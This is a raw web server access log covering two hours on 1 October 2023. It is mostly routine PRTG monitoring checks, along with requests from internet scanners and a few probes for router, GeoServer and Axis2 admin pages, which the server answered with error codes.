212.91.246.72 - - [01/Oct/2023:08:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:08:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.23 - - [01/Oct/2023:09:03:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2023:09:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.110.62.78 - - [01/Oct/2023:09:06:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2023:09:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.176 - - [01/Oct/2023:09:08:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Oct/2023:09:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.210.181 - - [01/Oct/2023:09:11:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Oct/2023:09:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.38 - - [01/Oct/2023:09:13:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Oct/2023:09:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.51 - - [01/Oct/2023:09:17:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.51 - - [01/Oct/2023:09:17:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.51 - - [01/Oct/2023:09:17:40 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.51 - - [01/Oct/2023:09:17:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Oct/2023:09:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.70 - - [01/Oct/2023:09:25:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.35.18.31 - - [01/Oct/2023:09:25:38 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Oct/2023:09:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.195 - - [01/Oct/2023:09:26:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2023:09:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.69 - - [01/Oct/2023:09:27:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
65.49.1.13 - - [01/Oct/2023:09:27:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2023:09:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.170.234.27 - - [01/Oct/2023:09:40:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:41:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:41:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Oct/2023:09:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.170.234.27 - - [01/Oct/2023:09:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:41:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:41:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:42:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:42:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.234.27 - - [01/Oct/2023:09:42:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Oct/2023:09:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.138 - - [01/Oct/2023:09:46:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.138 - - [01/Oct/2023:09:46:38 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:09:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.172 - - [01/Oct/2023:09:47:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
212.91.246.72 - - [01/Oct/2023:09:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.167 - - [01/Oct/2023:09:49:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
212.91.246.72 - - [01/Oct/2023:09:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.177 - - [01/Oct/2023:09:49:50 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
212.91.246.72 - - [01/Oct/2023:09:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.187.98.121 - - [01/Oct/2023:09:53:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [01/Oct/2023:09:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:09:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.130.61 - - [01/Oct/2023:10:02:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [01/Oct/2023:10:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.130.61 - - [01/Oct/2023:10:09:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.140.130.61 - - [01/Oct/2023:10:09:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [01/Oct/2023:10:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:10:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:10:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:10:13:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:10:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.248.32 - - [01/Oct/2023:10:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [01/Oct/2023:10:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.32.216.168 - - [01/Oct/2023:10:22:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
152.32.216.168 - - [01/Oct/2023:10:22:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.32.216.168 - - [01/Oct/2023:10:22:37 +0200] "t3 12.1.2" 400 329 "-" "-"
165.154.135.215 - - [01/Oct/2023:10:22:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/550.53 (KHTML, like Gecko) Chrome/72.0.2697 Safari/537.36"
165.154.135.215 - - [01/Oct/2023:10:22:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 8_1_1; Win64; x64) AppleWebKit/595.52 (KHTML, like Gecko) Chrome/93.0.1305 Safari/537.36"
165.154.135.215 - - [01/Oct/2023:10:22:43 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 8_1_2; Win64; x64) AppleWebKit/560.47 (KHTML, like Gecko) Chrome/74.0.2700 Safari/537.36"
165.154.135.215 - - [01/Oct/2023:10:22:43 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 7_1_1; Win64; x64) AppleWebKit/576.41 (KHTML, like Gecko) Chrome/78.0.580 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:10:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.135.215 - - [01/Oct/2023:10:22:43 +0200] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.135.215 - - [01/Oct/2023:10:22:43 +0200] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.135.215 - - [01/Oct/2023:10:22:44 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:10:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:10:25:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:10:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:10:27:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:10:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
